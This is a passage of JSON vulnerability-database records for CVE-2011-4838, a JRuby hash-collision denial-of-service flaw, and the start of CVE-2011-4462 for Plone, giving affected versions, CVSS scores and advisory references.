"cpe:2.3:a:jruby:jruby:1.6.0:rc3:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.3.1:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.0:rc3:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.0:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.5:*:*:*:*:*:*:*", "versionEndIncluding": "1.6.5", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.5.0:rc1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.0.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.3.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2011-4838"], "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-20"], "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-09T19:39:12", "references": [{"idList": ["VU:903934"], "type": "cert"}, {"idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"], "type": "freebsd"}, {"idList": ["OPENVAS:70754", "OPENVAS:136141256231071568", "OPENVAS:136141256231070754", "OPENVAS:71568"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["DEBIAN:DLA-209-1:3C908"], "type": "debian"}, {"idList": ["GENTOO_GLSA-201207-06.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "DEBIAN_DLA-209.NASL"], "type": "nessus"}, {"idList": ["SSV:26121"], "type": "seebug"}, {"idList": ["GLSA-201207-06"], "type": "gentoo"}], "rev": 2}, "score": {"modified": "2020-12-09T19:39:12", "rev": 2, "value": 5.6, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2020-12-09T19:39:12", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1349005479905779712", "text": " NEW: CVE-2011-4838 JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU c... (click for more) https://t.co/jce7a6Ksup?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1349005479905779712", "text": " NEW: CVE-2011-4838 JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU c... (click for more) https://t.co/jce7a6Ksup?amp=1"}]}}, "hash": "455a2868d160faa7d11ddfb499dd00b5360c94f9344130afdafa4761639661d4", "hashmap": [{"hash": "237c187a60e5866b50769c5eb9af0909", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "72e9a78eca65791c691b3c7de39604c5", "key": "cpe"}, {"hash": "37cda89e37d1920fde85ffc53ccf51b9", "key": "href"}, {"hash": "b34e5c25d82480fc6f4979a59fe0e9ff", "key": "cvss2"}, {"hash": "5a4bd22c495ccbe3aa9b54cab81d2473", "key": "cvss"}, {"hash": "20da023bb2c9bddaa0becd23dddd45f3", "key": "cvelist"}, {"hash": "8ed03f9772621a65835783a157489115", "key": "affectedSoftware"}, {"hash": "3a4bdedb1f853450f0877ded70ebe1d4", "key": "cpeConfiguration"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "afeb3f4dc39a66c2edac571149da1a7c", "key": "cpe23"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5c1c2a59f06ce368ba56a83d910aaa0a", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "51ec4a169231853196ced711c9889a34", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4838", "id": "CVE-2011-4838", "lastseen": "2020-12-09T19:39:12", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://security.gentoo.org/glsa/glsa-201207-06.xml", "http://rhn.redhat.com/errata/RHSA-2012-1232.html", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://secunia.com/advisories/50084", "http://secunia.com/advisories/47407", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72019", "http://jruby.org/2011/12/27/jruby-1-6-5-1.html"], "reporter": "cve@mitre.org", "title": "CVE-2011-4838", "type": "cve", "viewCount": 2}, "differentElements": ["cpe23", "cvss", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 5, "lastseen": "2020-12-09T19:39:12"}, {"bulletin": {"affectedSoftware": [{"name": "jruby jruby", "operator": "eq", "version": "1.4.0"}, {"name": "jruby jruby", "operator": "eq", "version": "1.1.6"}, {"name": "jruby jruby", "operator": "eq", "version": "1.5.5"}, {"name": "jruby jruby", "operator": "eq", "version": "0.9.0"}, {"name": "jruby jruby", "operator": "eq", "version": "1.0.1"}, {"name": "jruby jruby", "operator": "eq", "version": "0.9.9"}, {"name": "jruby jruby", "operator": "eq", "version": "1.5.2"}, {"name": "jruby jruby", "operator": "eq", "version": "1.0.2"}, {"name": "jruby jruby", "operator": "eq", "version": "1.6.1"}, {"name": "jruby jruby", "operator": "eq", "version": "1.1"}, {"name": "jruby jruby", "operator": "eq", "version": "0.9.8"}, {"name": "jruby jruby", "operator": "eq", "version": "1.6.0"}, {"name": "jruby jruby", "operator": "eq", "version": "0.9.1"}, {"name": "jruby jruby", "operator": "eq", "version": "1.0.3"}, {"name": "jruby jruby", "operator": "eq", "version": "0.9.2"}, {"name": "jruby jruby", "operator": "eq", "version": "1.5.6"}, {"name": "jruby jruby", "operator": "eq", "version": "1.3.1"}, {"name": "jruby jruby", "operator": "eq", "version": "1.5.3"}, {"name": "jruby jruby", "operator": "eq", "version": "1.6.2"}, {"name": "jruby jruby", "operator": "eq", "version": "1.1.3"}, {"name": "jruby jruby", "operator": "eq", "version": "1.1.1"}, {"name": "jruby jruby", "operator": "eq", "version": "1.2.0"}, {"name": "jruby jruby", "operator": "eq", "version": "1.5.1"}, {"name": "jruby jruby", "operator": "eq", "version": "1.1.5"}, {"name": "jruby jruby", "operator": "eq", "version": "1.3.0"}, {"name": "jruby jruby", "operator": "eq", "version": "1.1.4"}, {"name": "jruby jruby", "operator": "le", "version": "1.6.5"}, {"name": "jruby jruby", "operator": "eq", "version": "1.6.4"}, {"name": "jruby jruby", "operator": "eq", "version": "1.5.4"}, {"name": "jruby jruby", "operator": "eq", "version": "1.5.0"}, {"name": "jruby jruby", "operator": "eq", "version": "1.6.3"}, {"name": "jruby jruby", "operator": "eq", "version": "1.4.1"}, {"name": "jruby jruby", "operator": "eq", "version": "1.1.2"}, {"name": "jruby jruby", "operator": "eq", "version": "1.0"}, {"name": "jruby jruby", "operator": "eq", "version": "1.0.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:jruby:jruby:0.9.2", "cpe:/a:jruby:jruby:1.1.6", "cpe:/a:jruby:jruby:1.3.1", "cpe:/a:jruby:jruby:1.0.0", "cpe:/a:jruby:jruby:1.5.0", "cpe:/a:jruby:jruby:1.3.0", "cpe:/a:jruby:jruby:1.1.1", "cpe:/a:jruby:jruby:1.5.1", "cpe:/a:jruby:jruby:0.9.0", "cpe:/a:jruby:jruby:1.1.4", "cpe:/a:jruby:jruby:1.6.3", "cpe:/a:jruby:jruby:1.4.1", "cpe:/a:jruby:jruby:1.0.3", "cpe:/a:jruby:jruby:1.0", "cpe:/a:jruby:jruby:1.5.6", "cpe:/a:jruby:jruby:1.1.2", "cpe:/a:jruby:jruby:1.1.5", "cpe:/a:jruby:jruby:1.2.0", "cpe:/a:jruby:jruby:1.6.0", "cpe:/a:jruby:jruby:1.6.1", "cpe:/a:jruby:jruby:1.4.0", "cpe:/a:jruby:jruby:1.5.2", "cpe:/a:jruby:jruby:0.9.9", "cpe:/a:jruby:jruby:1.1", "cpe:/a:jruby:jruby:1.6.2", "cpe:/a:jruby:jruby:1.5.3", "cpe:/a:jruby:jruby:1.5.4", "cpe:/a:jruby:jruby:1.0.1", "cpe:/a:jruby:jruby:1.1.3", "cpe:/a:jruby:jruby:1.6.4", "cpe:/a:jruby:jruby:1.0.2", "cpe:/a:jruby:jruby:1.5.5", "cpe:/a:jruby:jruby:0.9.8", "cpe:/a:jruby:jruby:0.9.1"], "cpe23": ["cpe:2.3:a:jruby:jruby:1.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.6:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:rc3:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:b1:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.8:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:0.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:jruby:jruby:1.0.2:*:*:*:*:*:*:*"], "cvelist": ["CVE-2011-4838"], "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-20"], "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:11:25", "references": [{"idList": ["VU:903934"], "type": "cert"}, {"idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"], "type": "freebsd"}, {"idList": ["OPENVAS:70754", "OPENVAS:136141256231071568", "OPENVAS:136141256231070754", "OPENVAS:71568"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["DEBIAN:DLA-209-1:3C908"], "type": "debian"}, {"idList": ["GENTOO_GLSA-201207-06.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "DEBIAN_DLA-209.NASL"], "type": "nessus"}, {"idList": ["SSV:26121"], "type": "seebug"}, {"idList": ["GLSA-201207-06"], "type": "gentoo"}], "rev": 2}, "score": {"modified": "2019-05-29T18:11:25", "rev": 2, "value": 5.6, "vector": "NONE"}}, "hash": "3dd7e9182d64a38abccae3ae41101938886123483d3dfc191108d6223bbda889", "hashmap": [{"hash": "d7e09d18ee1462826bd1a9543ebac79b", "key": "cpe23"}, {"hash": "237c187a60e5866b50769c5eb9af0909", "key": "references"}, {"hash": "154b4b916d217d74ab314fe36fede520", "key": "cpe"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "79f130ef461e5fcadeacc002df89c60a", "key": "modified"}, {"hash": "37cda89e37d1920fde85ffc53ccf51b9", "key": "href"}, {"hash": "b34e5c25d82480fc6f4979a59fe0e9ff", "key": "cvss2"}, {"hash": "5a4bd22c495ccbe3aa9b54cab81d2473", "key": "cvss"}, {"hash": "20da023bb2c9bddaa0becd23dddd45f3", "key": "cvelist"}, {"hash": "c04c744e532b84c0a04b6b1e557b54b1", "key": "affectedSoftware"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "63d1dafed59d9bded2a524b239235cfd", "key": "published"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "5c1c2a59f06ce368ba56a83d910aaa0a", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "51ec4a169231853196ced711c9889a34", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4838", "id": "CVE-2011-4838", "lastseen": "2019-05-29T18:11:25", "modified": "2017-08-29T01:30:00", "objectVersion": "1.3", "published": "2011-12-30T01:55:00", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://security.gentoo.org/glsa/glsa-201207-06.xml", "http://rhn.redhat.com/errata/RHSA-2012-1232.html", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://secunia.com/advisories/50084", "http://secunia.com/advisories/47407", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72019", "http://jruby.org/2011/12/27/jruby-1-6-5-1.html"], "reporter": "cve@mitre.org", "title": "CVE-2011-4838", "type": "cve", "viewCount": 0}, "differentElements": ["cpe23", "cpe", "affectedSoftware"], "edition": 1, "lastseen": "2019-05-29T18:11:25"}], "edition": 8, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "651ac6624ff778a87e68941d1da0917b"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "eb4f57467d08967e15808c075e2738f4"}, {"key": "cvelist", "hash": "20da023bb2c9bddaa0becd23dddd45f3"}, {"key": "cvss", "hash": "41b62a8aa1ee5c40897717cadc30784a"}, {"key": "cvss2", "hash": "b6e256142260bf4cd919296d0ecdb405"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "7dd7925ad368cc8c6fb5df427ff6ba17"}, {"key": "description", "hash": "51ec4a169231853196ced711c9889a34"}, {"key": "extraReferences", "hash": "73dd98d1abd656f12b1fa8d66914aef8"}, {"key": "href", "hash": "37cda89e37d1920fde85ffc53ccf51b9"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "875718af4756f164e28a0e0c4f98198d"}, {"key": "published", "hash": "63d1dafed59d9bded2a524b239235cfd"}, {"key": "references", "hash": "237c187a60e5866b50769c5eb9af0909"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5c1c2a59f06ce368ba56a83d910aaa0a"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "27f7ee27d57ed807843a8d6fda80f798ad98b2719cadda3e20a5274b67b3abc2", "viewCount": 34, "enchantments": {"dependencies": {"references": [{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838"]}, {"type": "checkpoint_security", "idList": ["CPS:SK66350"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231070754", "OPENVAS:136141256231071568", "OPENVAS:71568", "OPENVAS:70754"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "GENTOO_GLSA-201207-06.NASL", "DEBIAN_DLA-209.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26121"]}], "modified": "2021-04-22T23:19:45", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2021-04-22T23:19:45", "rev": 2}, "twitter": {"counter": 1, "modified": "2020-12-09T19:39:12", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1349005479905779712", "text": " NEW: CVE-2011-4838 JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU c... (click for more) https://t.co/jce7a6Ksup?amp=1"}]}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "jruby:jruby", "name": "jruby", "operator": "lt", "version": "1.6.5.1"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": [], "cwe": ["CWE-400"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:jruby:jruby:1.6.5.1:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.6.5.1", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "47407", "refsource": "SECUNIA", "tags": ["Third Party Advisory"], "url": "http://secunia.com/advisories/47407"}, {"name": "20111228 n.runs-SA-2011.004 - web programming languages and platforms - DoS through hash table", "refsource": "BUGTRAQ", "tags": ["Broken Link"], "url": "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html"}, {"name": "GLSA-201207-06", "refsource": "GENTOO", "tags": ["Third Party Advisory"], "url": "http://security.gentoo.org/glsa/glsa-201207-06.xml"}, {"name": "VU#903934", "refsource": "CERT-VN", "tags": ["Third Party Advisory", "US Government Resource"], "url": "http://www.kb.cert.org/vuls/id/903934"}, {"name": "http://jruby.org/2011/12/27/jruby-1-6-5-1.html", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "http://jruby.org/2011/12/27/jruby-1-6-5-1.html"}, {"name": "http://www.ocert.org/advisories/ocert-2011-003.html", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "http://www.ocert.org/advisories/ocert-2011-003.html"}, {"name": "50084", "refsource": "SECUNIA", "tags": ["Third Party Advisory"], "url": "http://secunia.com/advisories/50084"}, {"name": "jruby-hash-dos(72019)", "refsource": "XF", "tags": ["Third Party Advisory", "VDB Entry"], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/72019"}, {"name": "RHSA-2012:1232", "refsource": "REDHAT", "tags": ["Broken Link"], "url": "http://rhn.redhat.com/errata/RHSA-2012-1232.html"}, {"name": "http://www.nruns.com/_downloads/advisory28122011.pdf", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "http://www.nruns.com/_downloads/advisory28122011.pdf"}], "immutableFields": []}, {"id": "CVE-2011-4462", "bulletinFamily": "NVD", "title": "CVE-2011-4462", "description": "Plone 4.1.3 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.", "published": "2011-12-30T01:55:00", "modified": "2017-08-29T01:30:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4462", "reporter": "cve@mitre.org", "references": ["http://www.nruns.com/_downloads/advisory28122011.pdf", "http://archives.neohapsis.com/archives/bugtraq/2011-12/0181.html", "http://secunia.com/advisories/47406", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72018"], "cvelist": ["CVE-2011-4462"], "type": "cve", "lastseen": "2021-04-22T23:19:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.9"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "le", "version": "*"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.6"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.1.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.7"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.0.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.2"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.1.3"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.5.1"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "1.0.4"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "2.0.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "4.0"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.5"}, {"cpeName": "plone:plone", "name": "plone", "operator": "eq", "version": "3.3.2"}, {"cpeName": 